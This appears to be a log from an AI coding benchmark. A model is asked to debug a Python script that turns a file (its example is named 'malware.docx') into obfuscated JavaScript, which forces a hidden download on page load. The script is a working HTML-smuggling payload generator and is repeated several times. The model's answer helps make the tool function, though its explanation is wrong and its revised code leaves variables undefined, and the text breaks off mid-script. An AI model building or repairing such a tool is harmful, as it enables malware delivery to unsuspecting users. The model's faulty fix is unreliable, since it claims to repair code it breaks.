1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
The issue here is in this line:
1 | with open(file=file_name, encoding='utf-8', mode="w") as wfile: |
1 | with open(file="script.txt", encoding='utf-8', mode="w") as wfile: |
Testing if the previous output contains the string file_name: True
Testing if the previous output contains the string with open(file=outfile: False
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
The bug in the code is that the outfile variable is not opened in write mode, so it doesn't write anything to the file. To fix this, the code should be changed to:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | if __name__ == '__main__': outfile = "script.txt" try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=outfile, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() |
Testing if the previous output contains the string file_name: True
Testing if the previous output contains the string with open(file=outfile: True
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + 